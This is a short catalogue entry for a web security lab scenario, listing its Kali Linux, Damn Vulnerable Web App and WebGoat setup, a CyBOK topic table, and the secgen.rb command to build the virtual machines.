Description An environment for web security labs. Kali Linux with Damn Vulnerable Web App server, WebGoat, and web sec tools.
Type lab-environment; ctf-lab
Author Z. Cliffe Schreuders
VM names kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Web & Mobile Security (WAM) Fundamental Concepts and Approaches web PKI and HTTPS; authentication; ACCESS CONTROL; cookies; passwords and alternatives; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); CASCADING STYLE SHEETS (CSS); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; Broken Access Control / Insecure Direct Object References; SESSION HIJACKING; CERTIFICATES; REPRESENTATIONAL STATE TRANSFER (REST); PERMISSION DIALOG BASED ACCESS CONTROL; CLIENT-SERVER MODELS
Web & Mobile Security (WAM) Client-Side Vulnerabilities and Mitigations client-side storage; CLIENT-SIDE VALIDATION; clickjacking
Web & Mobile Security (WAM) Server-Side Vulnerabilities and Mitigations injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); SAME ORIGIN POLICY (SOP); COMMAND INJECTION; SQL-INJECTION; CROSS-SITE REQUEST FORGERY (CSRF); CONFUSED DEPUTY ATTACKS; BACK-END; BLIND ATTACKS
Software Security (SS) Categories of Vulnerabilities Web vulnerabilities / OWASP Top 10; API vulnerabilities
Software Security (SS) Prevention of Vulnerabilities coding practices; Protecting against session management attacks; XSS; SQLi; CSRF; API design
Software Security (SS) Detection of Vulnerabilities dynamic detection
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic
Forensics (F) Main Memory Forensics network connections; data recovery and file content carving
Network Security (NS) Network Defence Tools FIREWALLS; IPTables; VIRTUAL - PRIVATE NETWORK (VPN)
Network Security (NS) Internet Architecture network layer security
Web & Mobile Security (WAM) FIREWALLS FIREWALLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/web_security/websec_lab.xml run

View source